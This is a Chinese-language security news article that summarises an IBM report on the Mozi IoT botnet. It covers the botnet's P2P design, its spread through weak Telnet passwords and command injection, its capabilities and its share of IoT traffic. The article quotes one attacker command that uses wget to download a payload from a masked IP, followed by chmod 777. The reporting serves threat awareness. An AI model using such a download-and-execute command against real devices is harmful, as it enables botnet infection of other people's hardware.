IBM 報告：2019年10月至 2020年6月Mozi 僵尸網絡占了 IoT 網絡流量的 90％

Mozi是一個物聯網僵尸網絡，它借鑒了Mirai變體和Gafgyt惡意軟件的代碼，該代碼于2019年底出現在威脅領域。

Mozi僵尸網絡被360 Netlab的安全專家發現，當時它正通過探測弱Telnet密碼來攻擊Netkit、D-Link和華為路由器。

根據研究人員的說法，在2019年的最后幾個月中，僵尸網絡主要參與了DDoS攻擊。

它實現了自定義擴展的分布式哈希表（DHT）協議，該協議提供類似于哈希表（[key，value]）的查找服務。

“ Mozi僵尸網絡依靠DHT協議來構建P2P網絡，并使用ECDSA384和xor算法來確保其組件和P2P網絡的完整性和安全性。” 閱讀專家發表的分析。“該示例通過帶有弱密碼和某些已知漏洞的Telnet通過Telnet傳播（請參見下面的列表）。在功能方面，Mozi僵尸網絡中每個節點的指令的執行由僵尸網絡主服務器發出的稱為Config的有效負載驅動。”

這種實現使得添加/刪除節點變得非常簡單，并且使用最少的workaround re- keys。

Mozi僵尸網絡使用自己的擴展DHT協議實現來構建P2P網絡。

該惡意軟件通過嘗試猜測目標設備的Telnet密碼并利用已知漏洞進行傳播。一旦獲得對設備的訪問權限，該機器人便會嘗試執行惡意有效負載，并且該機器人將自動加入Mozi P2P網絡。

僵尸網絡支持以下功能：

• DDoS攻擊
• 收集 Bot 信息
• 執行指定URL的負載
• 從指定的URL更新示例
• 執行系統或自定義命令

根據IBM發布的一份新報告，Mozi僵尸網絡占2019年10月至2020年6月觀察到的IoT網絡流量的90％。如果我們考慮到與其他僵尸程序不同，它沒有試圖從受感染設備中移除競爭對手，那么這個百分比令人印象深刻。

研究人員認為，Mozi運營商將配置不良的設備作為攻擊目標，但導致物聯網攻擊激增的因素之一是威脅行為者可以瞄準的“不斷擴大的物聯網格局”。專家解釋說，全球大約有310億個IoT設備部署，而IoT部署速率現在是每秒127個設備。

“ IBM的研究表明，Mozi在很大程度上繼續通過使用命令注入（CMDi）攻擊獲得成功，這通常是由于IoT設備的配置錯誤造成的。” 讀取IBM發布的報告。物聯網使用率的持續增長和配置協議不完善是造成這一躍遷的罪魁禍首。由于COVID-19，更頻繁地遠程訪問公司網絡可能進一步推動了這一增長。”

CMDi攻擊對于IoT設備非常普遍，在Mozi攻擊的情況下，威脅參與者通過使用“ wget” shell命令然后更改權限以允許黑客與受影響的系統進行交互來利用CMDi。

在最近的Mozi攻擊中，威脅行動者使用以下命令來確定設備是否易受CMDi攻擊，然后他們將下載并執行“ mozi.a ”文件。

wget xxx.xx.xxx.xxx/bins/mozi.a -o /var/tmp/mozi.a; chmod 777 /var/tmp/mozi.a; rm -rf /var/tmp/mozi.a

“我們對這個特定樣本的分析表明，該文件在沒有 MIPS 架構的微處理器上執行。這是運行簡化指令集計算機（RISC）架構的機器所理解的擴展，該架構在許多IoT設備上都很普遍。” 繼續分析。“一旦攻擊者通過僵尸網絡獲得對設備的完全訪問權限，就可以更改固件級別，并且可以在設備上植入其他惡意軟件。”

Mozi僵尸網絡針對以下設備：

IBM研究人員發現，Mozi僵尸網絡使用的基礎設施主要位于中國（占84％）。

IBM發布的報告包含有關僵尸網絡的其他詳細信息，包括危害指標（IoC）。